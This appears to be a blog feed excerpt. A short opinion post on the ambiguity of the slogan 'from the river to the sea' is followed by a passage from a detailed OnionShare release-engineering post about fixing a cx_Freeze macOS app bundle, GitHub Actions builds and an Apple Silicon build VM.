<p>Most people who chant things like, "From the river to the sea, Palestine will be free," aren't advocating genocide against Jews and the destruction of the state of Israel. They're advocating for Palestinian freedom from the very real and brutal Israeli oppression they face, and for their human rights.</p>
<p>But some people <em>are</em> advocating for genocide against Jews and the destruction of Israel.</p>
<p>The fact that "from the river to the sea" is an official Hamas slogan makes it difficult to determine which side you're on: support for human rights, or support for genocide. This is because it's an ambiguous slogan. This ambiguity makes it easy for right wingers to claim that support for Palestinian human rights is actually coded support for genocide against Jews.</p>
<p>In other words, if you use the slogan, people will <em>definitely</em> misinterpret your meaning, no matter your intent. Often this will be in bad faith: they will accuse you of antisemitism and advocating genocide against Jews even if you're clearly not doing that. But it will also happen in good faith: it's a Hamas slogan, after all, and is frequently used by genocidal antisemitic people.</p>
<p>Arguing over the term "from the river to the sea" is a waste of time. Like it or not, the connotation of this phrase is ambiguous. To some people it means human rights for Palestinians, and to others it means genocide against Jews. If we want to communicate clearly, and build a mass movement <em>against genocide</em>, then what's the point of reclaiming a phrase that, for a large number of people, has genocidal connotations?</p>
<p>Instead, we should be clear and unambiguous with our language. "Never again" -- a slogan about the Holocaust -- means never again for anyone. Hamas shouldn't slaughter innocent Jews at a music festival, and Israel Defense Forces shouldn't indiscriminately drop bombs on hospitals and refugee camps and shouldn't be murdering thousands of innocent children. Let's use language that clearly opposes genocide and fascism, and supports human rights.</p>
<p>If a symbol (like the swastika) or a slogan (like "from the river to the sea") gets co-opted by genocidal fascists, it's better to no longer use them in passing, at least without providing additional context. There's a time and place for reclaiming phrases and symbols. But in the last month, Israeli forces have killed roughly 10,000 people in Gaza, including 4,800 children who are by definition innocent, and are displacing millions more.</p>
<p>There's plenty of language we can use (against genocide, against religious extremism, for human rights and secular democracy, for ceasefire) that doesn't have genocidal connotations.</p>
What goes into making an OnionShare release: Part 32023-10-20T00:00:00ZMicah Leeurn:uuid:907a0732-01dd-3c37-83c7-dde3884eaef0<p>About a month ago I started working on an OnionShare release, documenting the entire arduous process. It's always a painful process, but it's absolutely bonkers how much work has gone into this release. This is the third, and not quite final, part of this epic release engineering saga.</p>
<p>In <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">part 1</a> of this series, I describe how I started making the release. I merged in translations from Weblate and made sure the correct translations were enabled for the desktop app and the documentation. After some struggling I got the Snapcraft release working--this involved upgrading the snap base from core20 to core22 so that I could upgrade from PySide2 to PySide6. I then ran into a wall trying to get Flatpak working.</p>
<p>In <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">part 2</a>, I finally finished Flatpak packaging, albeit with a bit of work still left for future Micah to solve. I successfully finished the Windows build, and I started making the macOS build. Where we last left off, OnionShare was running fine from the source tree on my Mac, but after I used cx_Freeze to convert the Python source code into a runnable Mac app bundle, it crashed with a segmentation fault when I ran it.</p>
<p>⚠️ WARNING: This blog post, and this whole cursed series of posts, may make you want to smash your face against your keyboard due to the sheer volume of technical issues, error messages, and general injury to morale. Because of all of the problems I consistently have been running into, and also how complex making OnionShare releases has become, this blog post is stupidly long.</p>
<p>In this post I describe how I make a universal2 macOS app bundle that runs fine on both older Intel Macs and newer Apple Silicon Macs. This journey includes fixing a bug, and submitting an <a href="https://web.archive.org/web/20231028233436/https://github.com/marcelotduarte/cx_Freeze/pull/2102">upstream PR</a>, in the cx_Freeze project. I also discovered that if only OnionShare's GitHub organization were using a paid plan, I could automate a lot more of making the universal2 app bundle with GitHub Actions--but alas, we're not paying for it yet. (Hey GitHub, can we have a free Team plan?)</p>
<p>I decided that since so much work has gone into this release so far, and so much new code has been added, that instead of making a full release I will just make a development release, OnionShare 2.6.1.dev1. This way it can be more thoroughly tested before making a stable release. So, I made the dev release, complete with code signing binaries in Windows using a HARICA-trusted secret key on a USB smart card that I passed through to a Windows VM, and also code signing and notarizing the macOS app bundle.</p>
<p>Here's a table of contents:</p>
<ul>
<li><a href="#fixing-the-onionshare-mac-app-bundle">Fixing the OnionShare Mac app bundle</a><ul>
<li><a href="#freezing-the-python-code">Freezing the Python code</a></li>
<li><a href="#debugging-the-app-bundle">Debugging the app bundle</a></li>
<li><a href="#putting-it-all-together">Putting it all together</a></li>
<li><a href="#fixing-the-github-actions-build">Fixing the GitHub Actions build</a></li>
<li><a href="#testing-the-intel-mac-binary-from-github-actions">Testing the Intel Mac binary from GitHub Actions</a></li>
</ul>
</li>
<li><a href="#updating-dependencies-again">Updating dependencies again</a></li>
<li><a href="#adventures-in-arm64-and-github-actions">Adventures in ARM64 and GitHub Actions</a></li>
<li><a href="#building-onionshare-for-apple-silicon">Building OnionShare for Apple Silicon</a><ul>
<li><a href="#setting-up-the-development-environment">Setting up the development environment</a></li>
<li><a href="#building-the-app-bundle">Building the app bundle</a></li>
<li><a href="#fixing-cx-freeze">Fixing cx_Freeze</a></li>
<li><a href="#finishing-the-build">Finishing the build</a></li>
</ul>
</li>
<li><a href="#merging-app-bundles-into-a-universal2-mac-app-bundle">Merging app bundles into a universal2 Mac app bundle</a></li>
<li><a href="#making-a-development-release">Making a development release</a><ul>
<li><a href="#windows-release">Windows release</a><ul>
<li><a href="#setting-up-the-harica-smart-card">Setting up the HARICA smart card</a></li>
<li><a href="#code-signing-and-packaging">Code signing and packaging</a></li>
</ul>
</li>
<li><a href="#macos-release">macOS release</a><ul>
<li><a href="#building-the-apple-silicon-app-bundle">Building the Apple Silicon app bundle</a></li>
<li><a href="#creating-the-universal2-app-bundle">Creating the universal2 app bundle</a></li>
<li><a href="#fixing-macos-code-signing">Fixing macOS code signing</a></li>
<li><a href="#packaging-the-app">Packaging the app</a></li>
<li><a href="#notarizing-the-app">Notarizing the app</a></li>
<li><a href="#testing-it-out">Testing it out</a></li>
</ul>
</li>
<li><a href="#testing-flatpak">Testing Flatpak</a></li>
<li><a href="#testing-snapcraft">Testing Snapcraft</a></li>
</ul>
</li>
<li><a href="#onionshare-v2-6-1-dev1-released">OnionShare v2.6.1.dev1 released</a></li>
</ul>
<p>I'll start where I left off, with the macOS build.</p>
<h2 id="fixing-the-onionshare-mac-app-bundle">Fixing the OnionShare Mac app bundle</h2><p>As I described in <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">part 2</a>, I have an old early 2015 MacBook Pro that I use as my dedicated macOS software release laptop. I made sure I had an up-to-date OnionShare development environment, and confirmed that I could run OnionShare locally from the source tree by changing to my <code>onionshare</code> folder and running:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>desktop
poetry<span class="w"> </span>run<span class="w"> </span>onionshare<span class="w"> </span>-v
</pre></div>
<p>This runs the OnionShare desktop Python script, and everything works great. To actually build the Mac app bundle, I run these commands:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>build
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/build-macos.py<span class="w"> </span>cleanup-build
</pre></div>
<p>The first command, <code>./setup-freeze.py build</code>, freezes the Python code and creates a folder that has macOS Mach-O binary files in it (<code>onionshare</code> and <code>onionshare-cli</code>) that you can natively run on a Mac. This folder contains a copy of Python and all of the libraries and extra resources that OnionShare needs. The second command, <code>./setup-freeze.py bdist_mac</code>, turns these binaries into an app bundle, and the third command, <code>./scripts/build-macos.py cleanup-build</code>, deletes unused files in the app bundle to save disk space.</p>
<p>When I left off, I got a segfault when trying to run the <code>onionshare</code> binary in the final app bundle. This time, I'm going to back up and see if I can get the binaries from <code>./setup-freeze.py build</code> to work, before I even make an app bundle.</p>
<h3 id="freezing-the-python-code">Freezing the Python code</h3><p>Since I'm using Python 3.11, that command puts the binaries in <code>build/exe.macosx-10.9-universal2-3.11</code>, so I'm starting by deleting that folder, just to clean up from last time:</p>
<div class="hll"><pre><span></span>rm<span class="w"> </span>-rf<span class="w"> </span>build/exe.macosx-10.9-universal2-3.11
</pre></div>
<p>Then I rebuilt the binaries:</p>
<pre><code>% poetry run python ./setup-freeze.py build
running build
running build_py
running build_exe
--snip--
WARNING: In file [/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/QtXml.abi3.so] guessing that @rpath/libshiboken6.abi3.6.5.dylib resolved to /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/shiboken6/libshiboken6.abi3.6.5.dylib.
WARNING: In file [/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/QtWebEngineCore.abi3.so] guessing that @rpath/libshiboken6.abi3.6.5.dylib resolved to /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/shiboken6/libshiboken6.abi3.6.5.dylib.
</code></pre>
<p>There were a bunch of other similar warnings at the end of the command, but for now I'm going to ignore them and see if the binaries run. I'll start with <code>onionshare-cli</code>, since it has far fewer dependencies than the desktop version and is more likely to work:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>build/exe.macosx-10.9-universal2-3.11
./onionshare-cli
</pre></div>
<p>It worked! Okay, let's try the GUI...</p>
<div class="hll"><pre><span></span>./onionshare<span class="w"> </span>-v
</pre></div>
<p>It worked too!</p>
<p><img src="mac-build-onionshare.png" alt="OnionShare binary successfully running"></p>
<p>Okay, this is great. This means that the problem is turning it into an app bundle, not the binary itself.</p>
<h3 id="debugging-the-app-bundle">Debugging the app bundle</h3><p>Next, I'll delete the app bundle from the previous build, then run the script to build the app bundle again and make sure it still crashes, just to be sure:</p>
<pre><code>% rm -rf build/OnionShare.app
% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
creating directory /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/bases/lib/Python -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/Python
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/bases/console-cpython-311-darwin -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/onionshare
--snip--
</code></pre>
<p>It finished. I'll try running the CLI binary from the app bundle first:</p>
<pre><code>% ./build/OnionShare.app/Contents/MacOS/onionshare-cli
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
│ ███ ▀█████▀ │
│ ▀██▄ ▀█▀ │
│ * ▀██▄ ▄█▄▄ * │
│ * ▀████▄▄▄████▀ │
│ ▀▀█████▀▀ │
│ -+- * │
│ ▄▀▄ ▄▀▀ █ │
│ █ █ ▀ ▀▄ █ │
│ █ █ █▀▄ █ ▄▀▄ █▀▄ ▀▄ █▀▄ ▄▀▄ █▄▀ ▄█▄ │
│ ▀▄▀ █ █ █ ▀▄▀ █ █ ▄▄▀ █ █ ▀▄█ █ ▀▄▄ │
│ │
│ v2.6.1 │
│ │
│ https://onionshare.org/ │
╰───────────────────────────────────────────╯
usage: onionshare-cli [-h] [--receive] [--website] [--chat] [--local-only] [--connect-timeout SECONDS] [--config FILENAME] [--persistent FILENAME]
[--title TITLE] [--public] [--auto-start-timer SECONDS] [--auto-stop-timer SECONDS] [--no-autostop-sharing] [--data-dir data_dir]
[--webhook-url webhook_url] [--disable-text] [--disable-files] [--disable_csp] [--custom_csp custom_csp] [-v]
[filename ...]
positional arguments:
filename List of files or folders to share
options:
-h, --help show this help message and exit
--receive Receive files
--snip--
</code></pre>
<p>This worked. Now, the desktop version:</p>
<pre><code>% ./build/OnionShare.app/Contents/MacOS/onionshare
zsh: segmentation fault ./build/OnionShare.app/Contents/MacOS/onionshare
</code></pre>
<p>This crashed. So most likely this has something to do with how PySide6 (which is what the desktop uses to display the GUI) is being packaged in the app bundle.</p>
<p>Since I know that the frozen app works when run directly from the build folder, but not when packaged in an app bundle, I should compare the two and see what's different. Here are the files in the working build:</p>
<pre><code>% ls -l build/exe.macosx-10.9-universal2-3.11
total 304
-rw-r--r-- 1 user staff 35285 Oct 2 2022 LICENSE
-rw-r--r-- 1 user staff 3211 Sep 28 14:54 frozen_application_license.txt
drwxr-xr-x 249 user staff 7968 Oct 9 20:54 lib
-rwxr-xr-x 1 user staff 54736 Sep 28 14:54 onionshare
-rwxr-xr-x 1 user staff 54736 Sep 28 14:54 onionshare-cli
</code></pre>
<p>And here are the files in the broken build (the app bundle):</p>
<pre><code>% ls -l build/OnionShare.app/Contents/MacOS
total 224
lrwxr-xr-x 1 user staff 16 Oct 9 20:54 lib -> ../Resources/lib
-rwxr-xr-x 1 user staff 54736 Oct 9 20:54 onionshare
-rwxr-xr-x 1 user staff 54736 Oct 9 20:54 onionshare-cli
</code></pre>
<p>In the working build, the <code>lib</code> folder is in the same folder as the <code>onionshare</code> binary, but in the broken build, <code>lib</code> is a symbolic link to <code>../Resources/lib</code>. Maybe it's choking on the symlink? Let's see what happens if I remove the symlink:</p>
<pre><code>% cd build/OnionShare.app/Contents/MacOS
% rm lib
% mv ../Resources/lib .
% ./onionshare
zsh: segmentation fault ./onionshare
</code></pre>
<p>It still crashes, so that's not it. After a cursory glance, the <code>lib</code> folders in the working and broken builds appear to be the same. But just to be safe, let me try copying the lib folder from the working build into the broken build and see if that fixes things.</p>
<pre><code>% rm -rf lib
% cp -r ../../../exe.macosx-10.9-universal2-3.11/lib .
% ./onionshare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
--snip--
</code></pre>
<p>It worked! Let me try adding the symlink back and see if it still works...</p>
<pre><code>% mv lib ../Resources
% ln -s ../Resources/lib lib
% ./onionshare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
--snip--
</code></pre>
<p>Yup, still works!</p>
<p>So I think I have one potential way forward: When building the app bundle, I can just copy the <code>lib</code> folder from <code>exe.macosx-10.9-universal2-3.11</code> into <code>OnionShare.app</code>. That feels hacky, but I don't see any other obvious solutions, so I'm going for it.</p>
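<p>In retrospect, there's a less error-prone way to compare two <code>lib</code> folders than a cursory glance: Python's <code>filecmp</code> module can recurse through both trees and report every file that differs or exists on only one side. A quick sketch of that approach:</p>

```python
import filecmp

def report_diffs(dir_a, dir_b):
    """Recursively list files that differ, or that exist on only one side."""
    diffs = []

    def walk(cmp, prefix=""):
        # diff_files: same name, different contents; left_only/right_only:
        # present on one side; funny_files: couldn't be compared
        for name in cmp.diff_files + cmp.left_only + cmp.right_only + cmp.funny_files:
            diffs.append(prefix + name)
        for sub, subcmp in cmp.subdirs.items():
            walk(subcmp, prefix + sub + "/")

    walk(filecmp.dircmp(dir_a, dir_b))
    return diffs

# e.g. report_diffs("build/exe.macosx-10.9-universal2-3.11/lib",
#                   "build/OnionShare.app/Contents/Resources/lib")
```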
<h3 id="putting-it-all-together">Putting it all together</h3><p>I'm going to start over from scratch and make sure this all works as intended. First, I'm going to delete the <code>build</code> folder, and rebuild the app bundle:</p>
<div class="hll"><pre><span></span>rm<span class="w"> </span>-rf<span class="w"> </span>build
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
</pre></div>
<p>I noticed that after this command finished, the new <code>build</code> folder had both <code>exe.macosx-10.9-universal2-3.11</code> and <code>OnionShare.app</code> in it, which means that I don't need to manually run <code>poetry run python ./setup-freeze.py build</code> first.</p>
<p>Next, I will delete the broken <code>lib</code> folder from the app bundle, and move the working <code>lib</code> folder into its place:</p>
<div class="hll"><pre><span></span>rm<span class="w"> </span>-rf<span class="w"> </span>build/OnionShare.app/Contents/Resources/lib
mv<span class="w"> </span>build/exe.macosx-10.9-universal2-3.11/lib<span class="w"> </span>build/OnionShare.app/Contents/Resources/
</pre></div>
<p>Next, I'll run the last step, the cleanup script:</p>
<pre><code>% poetry run python ./scripts/build-macos.py cleanup-build
> Delete unused Qt Frameworks
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtMultimediaQuick.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickControls2.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtQuickControls2.abi3.so
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtQuickControls2.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickParticles.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtRemoteObjects.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtRemoteObjects.abi3.so
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtRemoteObjects.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/Qt3DInput.framework
--snip--
> Delete more unused PySide6 stuff to save space
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Designer.app
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/glue
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/include
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/lupdate
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Qt/qml
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Assistant.app
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Linguist.app
--snip--
> Freed 1233 mb
</code></pre>
<p>Nice, it deleted an extra 1.2GB of data that we hopefully don't need to distribute. I'll try running it to make sure everything works:</p>
<pre><code>./build/OnionShare.app/Contents/MacOS/onionshare
</code></pre>
<p>Yup! It works great.</p>
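<p>Conceptually, the cleanup step just deletes a list of paths known to be unused and tallies the bytes freed. A stripped-down sketch of that idea -- the real script's path list and details differ:</p>

```python
import os
import shutil

def tree_size(path):
    """Total size in bytes of a file or directory tree."""
    if os.path.isfile(path):
        return os.path.getsize(path)
    return sum(
        os.path.getsize(os.path.join(root, name))
        for root, _dirs, files in os.walk(path)
        for name in files
    )

def cleanup(paths):
    """Delete each path that exists and report how much space was freed."""
    freed = 0
    for path in paths:
        if not os.path.exists(path):
            continue
        freed += tree_size(path)
        if os.path.isdir(path):
            shutil.rmtree(path)
        else:
            os.remove(path)
        print(f"Deleted: {path}")
    print(f"> Freed {freed // (1024 * 1024)} mb")
    return freed
```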
<h3 id="fixing-the-github-actions-build">Fixing the GitHub Actions build</h3><p>As I described in <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">part 2</a>, whenever a commit gets pushed into a PR branch in the OnionShare project, there are GitHub Actions workflows that try to automatically build Windows and Mac binaries. When making a release, I'd like to download this Mac binary, make sure it works, and codesign it.</p>
<p>Here's the "Build OnionShare" step in the GitHub Actions workflow, in the <code>build-mac-intel</code> job:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py build</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>I've updated it to this instead, basically to follow the steps I just manually performed:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">rm -rf build/OnionShare.app/Contents/Resources/lib</span>
<span class="w"> </span><span class="no">mv build/exe.macosx-10.9-universal2-3.10/lib build/OnionShare.app/Contents/Resources/</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>Notice that this time, the working <code>lib</code> folder is in a folder called <code>exe.macosx-10.9-universal2-3.10</code> instead of <code>exe.macosx-10.9-universal2-3.11</code> (<code>3.10</code> instead of <code>3.11</code>), because at the moment the GitHub Actions workflow is still using Python 3.10 -- I'll update that to 3.11 soon, but first I want to see if this works.</p>
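<p>As an aside, that build directory name appears to be derived from the platform tag and the running Python version, which is why it changes whenever the interpreter does. A minimal sketch of the pattern (inferred from the folder names in this build, not from a documented cx_Freeze API):</p>

```python
import sys
import sysconfig

# cx_Freeze's build output lands in build/exe.<platform>-<major>.<minor>.
# The platform tag comes from sysconfig, and the version suffix tracks the
# interpreter, so moving the workflow from Python 3.10 to 3.11 renames the
# folder. (Naming pattern assumed from this build's output directories.)
build_dir = f"exe.{sysconfig.get_platform()}-{sys.version_info.major}.{sys.version_info.minor}"
print(build_dir)  # e.g. exe.macosx-10.9-universal2-3.10 on the Intel runner
```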
<p>I committed my change to the GitHub actions workflow and pushed it to a <a href="https://github.com/onionshare/onionshare/pull/1779">PR branch</a> on GitHub, and waited for GitHub Actions to kick in and build the Intel Mac binary.</p>
<h3 id="testing-the-intel-mac-binary-from-github-actions">Testing the Intel Mac binary from GitHub Actions</h3><p>The GitHub Actions workflow generated artifacts, including the <code>mac-build</code> one:</p>
<p><img src="github-actions-artifacts.png" alt="Artifacts generated by GitHub Actions"></p>
<p>I downloaded the <code>mac-build.zip</code> artifact and copied it to my Intel Mac build machine. From there, I extracted it and tried running the OnionShare app, and it worked!</p>
<p><img src="macos-onionshare.png" alt="OnionShare app bundle from GitHub Actions running in macOS"></p>
<h2 id="updating-dependencies-again">Updating dependencies again</h2><p>I'm making great progress! I think now is a good time to pause and update all of the dependencies one final time. I'll start with the Python deps:</p>
<pre><code>cd cli
poetry update
cd ../desktop
poetry update
cd ../docs
poetry update
</code></pre>
<p>Next, I need to make sure Snapcraft and Flatpak use these latest dependencies too. I won't have to make any changes for Snapcraft since it just pip installs the latest versions, but I do need to update the Flatpak manifest to use these new versions.</p>
<p>I did this using the patched <code>flatpak-poetry-generator.py</code> script from flatpak-builder-tools, just as I had described in part 2.</p>
<p>Next, I want to update Python across the board to 3.11.6. I updated the instructions in <code>desktop/README.md</code> to tell people to install the latest version 3.11, and I also updated the version in the GitHub Actions workflow for both <code>build-win64</code> and <code>build-mac-intel</code>.</p>
<h2 id="adventures-in-arm64-and-github-actions">Adventures in ARM64 and GitHub Actions</h2><p>Good thing this release is taking so long to finish, because at the beginning of October, <a href="https://web.archive.org/web/20231028233436/https://github.blog/2023-10-02-introducing-the-new-apple-silicon-powered-m1-macos-larger-runner-for-github-actions/">GitHub announced support</a> for M1 macOS runners, so now I can make the GitHub Actions workflow build Apple Silicon binaries as well!</p>
<p>Or, well, that's what I thought. I spent about an hour and a half working on this. I made a new <code>build-mac-arm64</code> job in my GitHub Actions workflow, made it run on the <code>macos-13</code> runner, got it working and creating app bundles, and even started testing it. That's when I realized that the <code>macos-13</code> runner still uses an Intel processor, and that the GitHub blog post I read about M1 runners was talking about "large runners", which are different from "standard GitHub-hosted runners" and are only available on paid GitHub plans. The OnionShare organization uses a free plan, so this isn't actually available unless we pay for it.</p>
<p>We could maybe pay for a paid GitHub organization plan, but that's a separate topic. (Or if you're from GitHub and can donate Team plans to open source projects, we'd happily accept.)</p>
<p>So I <code>git reset</code> my branch back to before I started making the <code>build-mac-arm64</code> job and force pushed, reverting all my work. Maybe some day. But in the meantime, it looks like I'll have to manually build the Apple Silicon version of OnionShare, and also manually merge it with the Intel version to make a universal2 app bundle.</p>
<h2 id="building-onionshare-for-apple-silicon">Building OnionShare for Apple Silicon</h2><p>I have a MacBook Pro with an M1 processor which I can use to make the ARM64 (a.k.a. Apple Silicon) build. But I use this computer on a regular basis and I have all sorts of development environment relics installed, and I'd prefer a clean environment for creating a release build. Plus, I have Rosetta installed on this computer, which allows me to run Intel binaries even though I have an ARM64 processor--I specifically <em>don't</em> want Rosetta installed in my ARM64 development environment (or at least test environment) so I can make sure the final build actually works on ARM64 and isn't actually using Intel in the background.</p>
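<p>On the Rosetta point: macOS exposes a sysctl flag that reports whether the current process is being translated, which makes for a quick sanity check. A best-effort sketch (it assumes the <code>sysctl.proc_translated</code> flag that Apple documents for Rosetta detection; on other systems, or on Intel Macs where the flag doesn't exist, it simply returns False):</p>

```python
import platform
import subprocess

def running_under_rosetta():
    """Best-effort check for Rosetta 2 translation.

    sysctl.proc_translated is 1 when this process is an Intel binary
    being translated on Apple Silicon, 0 when running natively, and the
    sysctl doesn't exist at all on Intel Macs or other platforms.
    """
    try:
        out = subprocess.check_output(
            ["sysctl", "-n", "sysctl.proc_translated"],
            stderr=subprocess.DEVNULL,
        )
        return out.strip() == b"1"
    except (OSError, subprocess.CalledProcessError):
        return False

print(platform.machine(), "translated:", running_under_rosetta())
```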
<p>So, I opened the open source virtualization software <a href="https://mac.getutm.app/">UTM</a> and installed a new macOS Sonoma VM. UTM is great, and is the only free VM software that works with Apple Silicon right now, but its macOS guest support is limited: there's no shared clipboard, no way to change the resolution, and only spotty support for shared folders.</p>
<h3 id="setting-up-the-development-environment">Setting up the development environment</h3><p>Once I finished installing my new macOS VM, I set up an OnionShare development environment by following the <a href="https://github.com/onionshare/onionshare/blob/main/desktop/README.md">instructions</a> in <code>desktop/README.md</code>:</p>
<ul>
<li>When I first ran <code>git clone</code> to clone the source code, it prompted me to install the Xcode command line developer tools.</li>
<li>After cloning the OnionShare git repo, I checked out the <code>release-2.6.1</code> branch.</li>
<li>I downloaded and installed Python 3.11.6 from python.org.</li>
<li>I installed Poetry with <code>pip3 install poetry</code>. I also edited <code>~/.zshrc</code> to add this line, so that Python 3.11's <code>bin</code> dir is in the path: <code>export PATH=$PATH:/Library/Frameworks/Python.framework/Versions/3.11/bin</code>.</li>
<li>Installed Poetry dependencies by running: <code>cd desktop; poetry install</code>.</li>
<li>Downloaded Tor binaries from Tor Browser by running: <code>poetry run python ./scripts/get-tor.py macos</code>.</li>
</ul>
<p>When I did this last step I hit an error. The <code>get-tor.py</code> script was trying to subprocess out to <code>gpg</code>, but I didn't have it installed. So, I installed Homebrew, then installed GnuPG with <code>brew install gnupg</code>, and tried again. This time it worked. Then I moved on to the rest of the steps:</p>
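<p>This kind of failure, where a script subprocesses out to a CLI tool that isn't installed, is easy to guard against up front with an explicit check. A defensive sketch (the <code>require_tool</code> helper is hypothetical, not part of the real <code>get-tor.py</code>):</p>

```python
import shutil

def require_tool(name, hint=""):
    """Fail early with a helpful message if a required CLI tool is missing.

    Hypothetical helper: checks PATH before any subprocess call, so a
    missing binary produces a clear error instead of a confusing
    FileNotFoundError deep inside the script.
    """
    path = shutil.which(name)
    if path is None:
        msg = f"error: '{name}' not found in PATH"
        if hint:
            msg += f" (try: {hint})"
        raise SystemExit(msg)
    return path
```

<p>With a guard like <code>require_tool("gpg", "brew install gnupg")</code> at the top of the script, the missing dependency would have surfaced immediately.</p>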
<ul>
<li>I installed Go from <a href="https://go.dev/dl/">https://go.dev/dl/</a>, making sure to use the ARM64 version. I downloaded <code>go1.21.3.darwin-arm64.pkg</code>.</li>
<li>I compiled the pluggable transports (for ARM64) by running:<div class="hll"><pre><span></span>./scripts/build-pt-obfs4proxy.sh
./scripts/build-pt-snowflake.sh
./scripts/build-pt-meek.sh
</pre></div>
</li>
<li>Finally, I ran OnionShare from the source tree by running <code>poetry run onionshare -v</code>, just to make sure it's all working. Nice, the OnionShare window popped up.</li>
</ul>
<p>With this, my VM is set up for OnionShare development. Now I need to create an app bundle. To remind myself how to do that I looked at the GitHub Actions workflow for <code>build-mac-intel</code> and remembered that there's this step too:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install cx_Freeze/PySide6 build dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
